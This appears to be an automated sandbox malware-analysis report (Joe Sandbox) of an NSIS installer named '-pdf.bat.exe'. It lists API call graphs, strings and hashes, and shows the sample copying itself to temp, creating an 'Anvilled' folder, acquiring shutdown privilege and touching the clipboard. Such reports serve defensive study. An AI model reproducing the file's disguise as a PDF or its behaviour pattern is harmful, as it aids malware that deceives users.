3997->3988 4027 405e3d 28 API calls 3997->4027 4009 403002 21 API calls 3998->4009 4030 401399 85 API calls 3999->4030 4006 40303e 21 API calls 4000->4006 4010 40303e 21 API calls 4001->4010 4002->3988 4033 403002 21 API calls 4002->4033 4003->3988 4017 4017c8 4004->4017 4018 401718 4005->4018 4019 4018a2 SearchPathW 4006->4019 4020 4017da 4007->4020 4021 4018d2 4008->4021 4023 40161e Sleep 4009->4023 4024 4018e5 4010->4024 4025 401835 GetFullPathNameW 4011->4025 4013->4014 4014->3988 4026 4016e6 ShowWindow 4014->4026 4016 4016f6 SetFileAttributesW 4015->4016 4016->3988 4134 4066e4 FindFirstFileW 4017->4134 4096 406cda CharNextW CharNextW 4018->4096 4019->3988 4031 40303e 21 API calls 4020->4031 4111 406b6b 4021->4111 4022 405e3d 28 API calls 4022->3988 4023->3988 4040 401906 4024->4040 4041 40190e 4024->4041 4035 40184d 4025->4035 4036 401857 4025->4036 4026->3988 4027->3988 4030->3988 4034 4017e3 4031->4034 4033->3988 4039 40303e 21 API calls 4034->4039 4035->3988 4037 401889 GetShortPathNameW 4035->4037 4036->4035 4048 4066e4 2 API calls 4036->4048 4037->3988 4038 401780 4046 401790 4038->4046 4038->4047 4043 4017ec MoveFileW 4039->4043 4142 406c2f lstrcpynW 4040->4142 4143 406c2f lstrcpynW 4041->4143 4042 40670b CharNextW 4066 401720 4042->4066 4049 401804 4043->4049 4050 4017f8 4043->4050 4053 405e3d 28 API calls 4046->4053 4047->4022 4054 40186a 4048->4054 4049->3988 4057 4066e4 2 API calls 4049->4057 4050->4047 4051 40190c 4060 406e52 5 API calls 4051->4060 4052 401919 4144 40666b lstrlenW CharPrevW 4052->4144 4056 401797 4053->4056 4054->4035 4141 406c2f lstrcpynW 4054->4141 4110 406c2f lstrcpynW 4056->4110 4064 401814 4057->4064 4091 40192b 4060->4091 4064->3988 4137 406352 MoveFileExW 4064->4137 4065 4017a2 SetCurrentDirectoryW 4065->3988 4066->4038 4066->4042 4068 401769 GetFileAttributesW 4066->4068 4102 406611 4066->4102 4105 405f41 CreateDirectoryW 4066->4105 4131 405f21 CreateDirectoryW 4066->4131 4068->4066 4069 401968 4147 406cb2 GetFileAttributesW 
4069->4147 4071 4066e4 2 API calls 4071->4091 4074 40193f CompareFileTime 4074->4091 4075 401a18 4077 405e3d 28 API calls 4075->4077 4076 4019fd 4078 405e3d 28 API calls 4076->4078 4079 401a24 4077->4079 4078->3988 4116 4032c7 4079->4116 4081 406c2f lstrcpynW 4081->4091 4083 401a52 SetFileTime 4084 401a60 CloseHandle 4083->4084 4084->3988 4086 401a73 4084->4086 4085 405fbd 21 API calls 4085->4091 4087 401a78 4086->4087 4088 401a89 4086->4088 4089 405fbd 21 API calls 4087->4089 4090 405fbd 21 API calls 4088->4090 4092 401a80 lstrcatW 4089->4092 4093 401a91 4090->4093 4091->3997 4091->4069 4091->4071 4091->4074 4091->4075 4091->4076 4091->4081 4091->4085 4115 406a30 GetFileAttributesW CreateFileW 4091->4115 4150 406bbd 4091->4150 4092->4093 4095 406bbd MessageBoxIndirectW 4093->4095 4095->3988 4097 406cf8 4096->4097 4098 406d2f 4096->4098 4099 406d07 CharNextW 4097->4099 4100 406d0c 4097->4100 4098->4066 4099->4098 4100->4098 4101 40670b CharNextW 4100->4101 4101->4100 4103 4069fb 5 API calls 4102->4103 4104 406618 4103->4104 4104->4066 4106 405f8c GetLastError 4105->4106 4107 405faf 4105->4107 4106->4107 4108 405f99 SetFileSecurityW 4106->4108 4107->4066 4108->4107 4109 405fb3 GetLastError 4108->4109 4109->4107 4110->4065 4112 406b78 GetTickCount GetTempFileNameW 4111->4112 4113 406bb0 4112->4113 4114 406bac 4112->4114 4113->3988 4114->4112 4114->4113 4115->4091 4117 4032f0 4116->4117 4118 4032d5 SetFilePointer 4116->4118 4154 403148 GetTickCount 4117->4154 4118->4117 4123 403148 46 API calls 4124 403329 4123->4124 4125 403391 ReadFile 4124->4125 4126 403338 4124->4126 4127 401a3a 4124->4127 4125->4127 4126->4127 4128 406a5d ReadFile 4126->4128 4169 406b20 WriteFile 4126->4169 4127->4083 4127->4084 4128->4126 4130->3988 4132 405f33 GetLastError 4131->4132 4133 405f3b 4131->4133 4132->4133 4133->4066 4135 4066fa FindClose 4134->4135 4136 406705 4134->4136 4135->4136 4136->3988 4138 406373 4137->4138 4139 406366 4137->4139 4138->4050 4205 40641b 4139->4205 4141->4035 
4142->4051 4143->4052 4145 40191f lstrcatW 4144->4145 4146 406688 lstrcatW 4144->4146 4145->4051 4146->4145 4148 406cd4 4147->4148 4149 406cc4 SetFileAttributesW 4147->4149 4148->4091 4149->4148 4151 406bd2 4150->4151 4152 406c20 4151->4152 4153 406be8 MessageBoxIndirectW 4151->4153 4152->4091 4153->4152 4155 4032b3 4154->4155 4156 403173 4154->4156 4157 4033e9 36 API calls 4155->4157 4171 403131 SetFilePointer 4156->4171 4164 40329a 4157->4164 4159 40317e SetFilePointer 4162 4031a5 4159->4162 4162->4164 4165 406b20 WriteFile 4162->4165 4166 4032a4 SetFilePointer 4162->4166 4172 406fbd 4162->4172 4180 40311b 4162->4180 4183 4033e9 4162->4183 4164->4127 4167 406a5d ReadFile 4164->4167 4165->4162 4166->4155 4168 403312 4167->4168 4168->4123 4168->4127 4170 406b41 4169->4170 4170->4126 4171->4159 4173 406fe8 4172->4173 4174 406fe0 4172->4174 4173->4174 4175 407123 4173->4175 4176 407109 GlobalAlloc 4173->4176 4177 4070ff GlobalFree 4173->4177 4174->4162 4175->4174 4178 407196 GlobalAlloc 4175->4178 4179 40718f GlobalFree 4175->4179 4176->4174 4176->4175 4177->4176 4178->4174 4179->4178 4181 406a5d ReadFile 4180->4181 4182 40312e 4181->4182 4182->4162 4184 403411 4183->4184 4185 4033f8 4183->4185 4188 403423 GetTickCount 4184->4188 4189 40341a 4184->4189 4186 403401 DestroyWindow 4185->4186 4187 403408 4185->4187 4186->4187 4187->4162 4191 403431 4188->4191 4192 40348d 4188->4192 4200 406324 4189->4200 4194 403468 CreateDialogParamW ShowWindow 4191->4194 4195 40343a 4191->4195 4192->4162 4194->4192 4195->4192 4204 4033cb MulDiv 4195->4204 4197 403448 wsprintfW 4198 405e3d 28 API calls 4197->4198 4199 403466 4198->4199 4199->4162 4201 406336 PeekMessageW 4200->4201 4202 40632c DispatchMessageW 4201->4202 4203 403421 4201->4203 4202->4201 4203->4162 4204->4197 4206 406471 GetShortPathNameW 4205->4206 4207 40644b 4205->4207 4208 406551 4206->4208 4209 406486 4206->4209 4232 406a30 GetFileAttributesW CreateFileW 4207->4232 4208->4138 4209->4208 4211 40648e wsprintfA 
4209->4211 4213 405fbd 21 API calls 4211->4213 4212 406455 CloseHandle GetShortPathNameW 4212->4208 4214 406469 4212->4214 4215 4064b7 4213->4215 4214->4206 4214->4208 4233 406a30 GetFileAttributesW CreateFileW 4215->4233 4217 4064c4 4217->4208 4218 4064cf GetFileSize GlobalAlloc 4217->4218 4219 40654a CloseHandle 4218->4219 4220 4064ee 4218->4220 4219->4208 4221 406a5d ReadFile 4220->4221 4222 4064f6 4221->4222 4222->4219 4234 406c4b lstrlenA lstrlenA 4222->4234 4225 406556 4227 406c4b 3 API calls 4225->4227 4226 406509 lstrcpyA 4229 40651b 4226->4229 4227->4229 4228 40652c SetFilePointer 4230 406b20 WriteFile 4228->4230 4229->4228 4231 406543 GlobalFree 4230->4231 4231->4219 4232->4212 4233->4217 4235 406505 4234->4235 4236 406c6a 4234->4236 4235->4225 4235->4226 4236->4235 4237 406c97 lstrlenA 4236->4237 4237->4235 4237->4236 5488 405036 5489 405042 5488->5489 5490 40505a 5488->5490 5498 406b4f GetDlgItemTextW 5489->5498 5492 405060 SHGetPathFromIDListW 5490->5492 5493 40508e 5490->5493 5494 405070 5492->5494 5495 40504f SendMessageW 5492->5495 5497 401533 102 API calls 5494->5497 5495->5493 5497->5495 5498->5495 5499 401ab6 5500 40303e 21 API calls 5499->5500 5501 401abd 5500->5501 5502 406bbd MessageBoxIndirectW 5501->5502 5503 401709 5502->5503 5504 703110c7 5511 703110f8 5504->5511 5505 703112be GlobalFree 5506 703111d7 GlobalAlloc 5506->5511 5507 70311258 GlobalFree 5507->5511 5508 70311548 3 API calls 5508->5511 5509 703112ba 5509->5505 5510 70311296 GlobalFree 5510->5511 5511->5505 5511->5506 5511->5507 5511->5508 5511->5509 5511->5510 5512 703115eb 2 API calls 5511->5512 5514 70311165 GlobalAlloc 5511->5514 5515 70311638 lstrcpyW 5511->5515 5513 703111ca GlobalFree 5512->5513 5513->5511 5514->5511 5516 703111ab GlobalFree 5515->5516 5516->5511 5517 70311cc7 5518 70311cee 5517->5518 5519 70311d4e 5518->5519 5520 70311d2f GlobalFree 5518->5520 5521 703115eb 2 API calls 5519->5521 5520->5519 5522 70311de5 GlobalFree GlobalFree 5521->5522 5523 402837 5524 
40303e 21 API calls 5523->5524 5527 401afd 5524->5527 5526 402855 5527->5523 5527->5526 5528 406a30 GetFileAttributesW CreateFileW 5527->5528 5528->5527 5529 703112c6 5530 7031101b 5 API calls 5529->5530 5531 703112df 5530->5531 5532 401fb8 GetDC 5533 403002 21 API calls 5532->5533 5534 401fc8 GetDeviceCaps MulDiv ReleaseDC 5533->5534 5535 403002 21 API calls 5534->5535 5536 401ff8 5535->5536 5537 405fbd 21 API calls 5536->5537 5538 402032 CreateFontIndirectW 5537->5538 5539 401dba 5540 403002 21 API calls 5539->5540 5541 401dc1 5540->5541 5542 403002 21 API calls 5541->5542 5543 401dce 5542->5543 5544 401de1 5543->5544 5545 40303e 21 API calls 5543->5545 5546 401df6 5544->5546 5547 40303e 21 API calls 5544->5547 5545->5544 5548 401e50 5546->5548 5549 401e01 5546->5549 5547->5546 5550 40303e 21 API calls 5548->5550 5551 403002 21 API calls 5549->5551 5552 401e55 5550->5552 5553 401e06 5551->5553 5554 40303e 21 API calls 5552->5554 5555 403002 21 API calls 5553->5555 5557 401e5e FindWindowExW 5554->5557 5556 401e11 5555->5556 5558 401e41 SendMessageW 5556->5558 5559 401e1e SendMessageTimeoutW 5556->5559 5560 401e7b 5557->5560 5558->5560 5559->5560 4816 70311a4a 4817 70311aa1 4816->4817 4818 70311a5a VirtualProtect 4816->4818 4818->4817 5561 401bbb 5562 40303e 21 API calls 5561->5562 5563 401bc4 ExpandEnvironmentStringsW 5562->5563 5564 401bd7 5563->5564 5566 401be9 5563->5566 5565 401bdd lstrcmpW 5564->5565 5564->5566 5565->5566

Control-flow Graph

[Figure: control-flow graph beginning at 00403804; legend: Executed, Not Executed]
APIs
• SetErrorMode.KERNELBASE(00008001), ref: 00403820
• GetVersionExW.KERNEL32 ref: 00403849
• GetVersionExW.KERNEL32(?), ref: 0040385C
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403904
• #17.COMCTL32(?,0000000A,?), ref: 0040393E
• OleInitialize.OLE32(00000000), ref: 00403945
• SHGetFileInfoW.SHELL32(004085D4,00000000,?,000002B4,00000000), ref: 00403964
• GetCommandLineW.KERNEL32(00428D40,NSIS Error), ref: 00403979
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\-pdf.bat.exe",?,"C:\Users\user\Desktop\-pdf.bat.exe",00000000), ref: 004039C5
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403AC5
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403AD6
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403AE2
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403AF6
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403AFE
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403B0F
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403B17
• DeleteFileW.KERNELBASE(1033), ref: 00403B31
  • Part of subcall function 0040348F: GetTickCount.KERNEL32 ref: 004034A1
  • Part of subcall function 0040348F: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\-pdf.bat.exe,00000400), ref: 004034BD
• OleUninitialize.OLE32(?), ref: 00403BBE
• ExitProcess.KERNEL32 ref: 00403BD9
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\-pdf.bat.exe",00000000,?), ref: 00403BF0
                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408624,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\-pdf.bat.exe",00000000,?), ref: 00403C03
                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\-pdf.bat.exe",00000000,?), ref: 00403C12
                                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\-pdf.bat.exe",00000000,?), ref: 00403C21
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403C45
                                                                                                                                                • DeleteFileW.KERNEL32(004209F0,004209F0,?,0042A000,?), ref: 00403C9C
                                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\-pdf.bat.exe,004209F0,?), ref: 00403CAE
                                                                                                                                                • CloseHandle.KERNEL32(00000000,004209F0,004209F0,?,004209F0,00000000), ref: 00403CE7
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?), ref: 00403D1F
                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403D26
                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403D3B
                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403D5E
                                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403D83
                                                                                                                                                  • Part of subcall function 0040670B: CharNextW.USER32(?,004039C4,"C:\Users\user\Desktop\-pdf.bat.exe",?,"C:\Users\user\Desktop\-pdf.bat.exe",00000000), ref: 00406721
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Filelstrcat$Process$CharCurrentDeleteDirectoryEnvironmentExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountErrorHandleInfoInitializeLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                                                                                                                                • String ID: 4jw$"C:\Users\user\Desktop\-pdf.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Anvilled$C:\Users\user\AppData\Local\Anvilled$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\-pdf.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                • API String ID: 354787867-154293319

Control-flow Graph

[Control-flow graph for the code starting at 00404C33 (legend: executed / not executed); graph rendering not preserved]
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00404C94
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00404CA4
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00404CE1
                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 00404CE9
                                                                                                                                                • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404D0B
                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404D1A
                                                                                                                                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404D28
                                                                                                                                                • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404D32
                                                                                                                                                  • Part of subcall function 00405FBD: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466), ref: 0040618F
                                                                                                                                                • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404D44
                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404D68
                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00404D7A
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00404D9C
                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404DB0
                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404DCB
                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404DD5
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404E4A
                                                                                                                                                • ShowWindow.USER32(?,?), ref: 00404E4F
                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00404CB4
                                                                                                                                                  • Part of subcall function 00405606: SendMessageW.USER32(?,?,?,0040543B), ref: 00405614
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00404DF5
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005967,00000000), ref: 00404E03
                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00404E0A
                                                                                                                                                • ShowWindow.USER32(?), ref: 00404E85
                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404EC4
                                                                                                                                                • CreatePopupMenu.USER32 ref: 00404ED8
                                                                                                                                                • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404EF4
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00404F12
                                                                                                                                                • TrackPopupMenu.USER32(?,?,?,?,00000000,?,00000000), ref: 00404F34
                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404F63
                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00404F73
                                                                                                                                                • EmptyClipboard.USER32 ref: 00404F79
                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404F85
                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00404F92
                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404FAE
                                                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 00404FD1
                                                                                                                                                • SetClipboardData.USER32(0000000D,?), ref: 00404FDC
                                                                                                                                                • CloseClipboard.USER32 ref: 00404FE2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2901622961-0

Control-flow Graph

[Control-flow graph for the code starting at 00405B41 (legend: executed / not executed); graph rendering not preserved]
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004069FB: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403918,?), ref: 00406A09
                                                                                                                                                  • Part of subcall function 004069FB: GetProcAddress.KERNEL32(00000000), ref: 00406A25
                                                                                                                                                • lstrcatW.KERNEL32(1033,00421200,80000001,Control Panel\Desktop\ResourceLocale,00000000,00421200,00000000,00000002,00000000,776A3420,00000000,776A3170), ref: 00405BC4
                                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Anvilled,1033,00421200,80000001,Control Panel\Desktop\ResourceLocale,00000000,00421200,00000000,00000002,00000000), ref: 00405C48
                                                                                                                                                • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Anvilled,1033,00421200,80000001,Control Panel\Desktop\ResourceLocale,00000000,00421200,00000000), ref: 00405C5D
                                                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00405C68
                                                                                                                                                • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Anvilled), ref: 00405CB1
                                                                                                                                                  • Part of subcall function 00406734: wsprintfW.USER32 ref: 00406741
                                                                                                                                                • RegisterClassW.USER32(00428CE0), ref: 00405CF6
                                                                                                                                                • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00405D0D
                                                                                                                                                • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405D42
                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405D74
                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428CE0), ref: 00405D9F
                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00428CE0), ref: 00405DAC
                                                                                                                                                • RegisterClassW.USER32(00428CE0), ref: 00405DB9
                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00405095,00000000), ref: 00405DD4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Anvilled$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                • API String ID: 1975747703-1429194998
                                                                                                                                                • Opcode ID: edc898fe0945ce5741e5c6398a2f53b5c95347c49c29c129406737a47328b788
                                                                                                                                                • Instruction ID: a853d14af79947da6f9b2e8ec0e988c18d5098f7c5c81f72d75faaabc62159d3
                                                                                                                                                • Opcode Fuzzy Hash: edc898fe0945ce5741e5c6398a2f53b5c95347c49c29c129406737a47328b788
                                                                                                                                                • Instruction Fuzzy Hash: B461E570201605BEE620AB65EE46F2B366CEF14758F51403FF941B61E1DF7C59018EAD

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040674D: lstrlenW.KERNEL32(00425A78,00000000,00425A78,00425A78,00000000,?,?,00406850,?,00000000,776A3420,00000000), ref: 004067A1
                                                                                                                                                  • Part of subcall function 0040674D: GetFileAttributesW.KERNEL32(00425A78,00425A78), ref: 004067B2
                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,00000000,776A3420,00000000), ref: 0040685A
                                                                                                                                                • lstrcatW.KERNEL32(00425278,\*.*,00425278,?,00000000,?,00000000,776A3420,00000000), ref: 004068AC
                                                                                                                                                • lstrcatW.KERNEL32(?,004082B0,?,00425278,?,00000000,?,00000000,776A3420,00000000), ref: 004068CD
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004068D0
                                                                                                                                                • FindFirstFileW.KERNEL32(00425278,?), ref: 004068E7
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 00406978
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040698A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                                                                                                                                • String ID: \*.*
                                                                                                                                                • API String ID: 2636146433-1173974218
                                                                                                                                                • Opcode ID: 463e512100b669bbf7148d43155592073aa84a6e49227fc6e470d5d44a4eaa6f
                                                                                                                                                • Instruction ID: 1679f268d6f2e5967709a76d03bf4fa32a028c009496777b7310e2c01a678238
                                                                                                                                                • Opcode Fuzzy Hash: 463e512100b669bbf7148d43155592073aa84a6e49227fc6e470d5d44a4eaa6f
                                                                                                                                                • Instruction Fuzzy Hash: DD413871105711A9D320BB358D05A7B76A8DF41314F16093FF893B25D1EB3C8D6686BE
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNELBASE(00000000,00427678,00000000,00406791,00425A78), ref: 004066EF
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004066FB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                • String ID: xvB
                                                                                                                                                • API String ID: 2295610775-1142169142
                                                                                                                                                • Opcode ID: d8979bb77e590fa5ef2a9612d96aa81559f91ada1dd450823ce235b6f1bcece9
                                                                                                                                                • Instruction ID: e316ebd25e92877113dce2226e0b75b13365ed97af6927094cd3affcf016b760
                                                                                                                                                • Opcode Fuzzy Hash: d8979bb77e590fa5ef2a9612d96aa81559f91ada1dd450823ce235b6f1bcece9
                                                                                                                                                • Instruction Fuzzy Hash: 17D0127150A1209BD2401778AE0C85B7A59AF153757524B36F0A6F21E0E7348C6286AC

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004050D4
                                                                                                                                                • ShowWindow.USER32(?), ref: 004050FE
                                                                                                                                                • GetWindowLongW.USER32(?,?), ref: 0040510F
                                                                                                                                                • ShowWindow.USER32(?,?), ref: 0040512B
                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00405252
                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0040525C
                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00405276
                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004052C4
                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405373
                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040539C
                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004053B0
                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?), ref: 004053C4
                                                                                                                                                • EnableWindow.USER32(?), ref: 004053DC
                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004053F3
                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004053FA
                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000001), ref: 0040540B
                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00405422
                                                                                                                                                • lstrlenW.KERNEL32(00421200,?,00421200,00000000), ref: 00405453
                                                                                                                                                  • Part of subcall function 00405FBD: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466), ref: 0040618F
                                                                                                                                                • SetWindowTextW.USER32(?,00421200), ref: 0040546B
                                                                                                                                                  • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                                                                                  • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                                                                                • DestroyWindow.USER32(?,00000000), ref: 004054B3
                                                                                                                                                • CreateDialogParamW.USER32(?,?,-00429D60), ref: 004054E7
                                                                                                                                                  • Part of subcall function 0040561D: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405637
                                                                                                                                                • GetDlgItem.USER32(?,000003FA), ref: 00405510
                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00405517
                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00405523
                                                                                                                                                • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 0040553C
                                                                                                                                                • ShowWindow.USER32(?,?,00000000), ref: 0040555B
                                                                                                                                                  • Part of subcall function 004055EB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004055FD
                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004055A1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 162979904-0
